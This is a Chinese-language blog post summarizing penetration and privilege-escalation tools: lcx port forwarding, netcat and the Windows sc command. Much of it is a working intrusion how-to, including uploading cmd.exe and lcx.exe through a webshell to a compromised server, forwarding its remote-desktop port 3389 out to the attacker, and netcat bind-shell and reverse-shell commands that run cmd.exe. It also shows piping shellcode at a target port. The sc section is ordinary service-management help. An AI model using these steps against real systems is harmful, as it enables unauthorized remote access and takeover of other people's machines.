cmd+lcx+nc+sc提权工具总结

lcx：端口映射工具

1.在自己的host上的cmd下运行：lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口

2.在服务器器上运行：lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口

3.在自己的host上的cmd下运行mstsc，输入127.0.0.1:3389远程连接服务器

————————————————————
lcx内网端口转化，解决在内网不能远程桌面登录：
1.webshll目标站点的wscript组件开启，并且有一个可读写的目录，一般上传到c:/recyle目录下
2.上传我们的cmd.exe和lcx.exe上去
3.然后在shll路径中填入：c:/recyle/cmd.exe 下面就输入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下输入： d:/lcx.exe listen 51 3333 监听51并转发到3333端口
4.在本地远程桌面里面输入:127.0.0.1:3333
———————————————

nc：监听工具

A:基本用法

1.连接到REMOTE主机

格式：nc.exe -nvv 192.168.2.2 80

讲解：连到192.168.2.2的TCP80端口

2.监听LOCAL主机

格式：nc -l -p 80

讲解：监听本机的TCP80端口

3.扫描REMOTE主机

格式：nc -nvv -w2 -z 192.168.2.2 80-445

讲解：扫描192.168.2.2的TCP80到TCP445的所有端口

4.REMOTE主机绑定SHELL

格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe

讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5.REMOTE主机绑定SHELL并反向连接

格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.2.2 5354

讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.2.2的TCP5354端口

B:高级用法

6.作攻击程序用

格式1：type.exe c:\exploit.txt|nc -nvv 192.168.2.2 80

格式2：nc -nvv 192.168.2.2 80

讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果，真是有异曲同工之妙:P) 附：'c:\exploit.txt'为shellcode等

7.作蜜罐用[1]

格式：nc -L -p 80

讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8.作蜜罐用[2]

格式：nc -L -p 80>c:\log.txt

讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把'& gt;' 改为'>>'即可以追加日志附：'c:\log.txt'为日志等

9.作蜜罐用[3]

格式1：nc -L -p 80

格式2：type.exe c:\honeypot.txt|nc -L -p 80 ，并把'c:\honeypot.txt'的内容'送'入其管道中

sc：WINNT命令(C:\WINDOWS\system32\sc.exe)

功能：

1、SC可以检索和设置有关服务的控制信息。可以使用 SC.exe 来测试和调试服务程序。
2、可以设置存储在注册表中的服务属性，以控制如何在启动时启动服务应用程序，以及如何将其作为后台程序运行。即更改服务的启动状态。
3、SC 命令还可以用来删除系统中的无用的服务。（除非对自己电脑中的软硬件所需的服务比较清楚，否则不建议删除任何系统服务，尤其是基础服务）
4、SC命令的参数可以配置指定的服务，检索当前服务的状态，也可以停止和启动服务（功能上类似NET STOP/START命令，但SC速度更快且能停止更多的服务）。
5、可以创建批处理文件来调用不同的 SC 命令，以自动启动或关闭服务序列。
SC.exe 提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

命令：

query-----------查询服务的状态，

或枚举服务类型的状态。

queryex---------查询服务的扩展状态，

或枚举服务类型的状态。

start-----------启动服务。

pause-----------发送 PAUSE 控制请求到服务。

interrogate-----发送 INTERROGATE 控制请求到服务。

continue--------发送 CONTINUE 控制请求到服务。

stop------------发送 STOP 请求到服务。

config----------(永久地)更改服务的配置。

description-----更改服务的描述。

failure---------更改服务失败时所进行的操作。

qc--------------查询服务的配置信息。

qdescription----查询服务的描述。

qfailure--------查询失败服务所进行的操作。

delete----------(从注册表)删除服务。

create----------创建服务(将其添加到注册表)。

control---------发送控制到服务。

sdshow----------显示服务的安全描述符。

sdset-----------设置服务的安全描述符。

GetDisplayName--获取服务的 DisplayName。

GetKeyName------获取服务的 ServiceKeyName。

EnumDepend------枚举服务的依存关系。

下列命令不查询服务名称:

boot------------(ok | bad) 表明是否将上一次启动保存为

最后所知的好的启动配置

Lock------------锁定服务数据库

QueryLock-------查询 SCManager 数据库的 LockStatus

示例:

sc start MyService

您想查阅 QUERY 和 QUERYEX 命令的帮助吗? [ y | n ]:

这是自带的帮助

如果要删除一个已经存在的服务就是

sc delete servername

出处：https://www.cnblogs.com/milantgh/p/3601964.html

扩展阅读：LCX

（一）

这个工具以前使用的初衷是内网渗透，需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。

当然这一切的前提是内网可以访问外网，检测方法当然就是直接ping 一个外网IP即可。

这个工具之前折腾了很久发现有点不稳定，断掉无法重新连接，昨晚重新调整了下命令参数总算可以正常使用，稳定性妥妥的。

linux版lcx工具下载

linux版lcx端口转发2016.6.10 - 12.04 Kb

lcx使用方法：

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2